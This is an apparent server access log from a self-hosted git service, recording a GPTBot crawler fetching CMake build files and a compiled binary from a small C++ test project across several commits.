"/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11983] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:14:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10155] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10025] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:14:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11079] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16381] [Gzip 12.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:14:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:14:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11246] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:14:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11493] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:14:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:14:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:14:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9948] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:14:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51207] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/TestApp" +[17/Feb/2026:14:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10775] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" +[17/Feb/2026:14:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14615] [Gzip 5.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:49:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:49:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9998] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:49:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:14:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16187] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" +[17/Feb/2026:14:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/TestApp" +[17/Feb/2026:14:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile" +[17/Feb/2026:14:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile" +[17/Feb/2026:14:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11826] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11190] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29809] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11099] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:49:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14637] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:49:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11162] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:49:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14293] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:49:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11269] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20359] [Gzip 16.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:49:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11020] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9950] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10175] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39739] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9959] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] 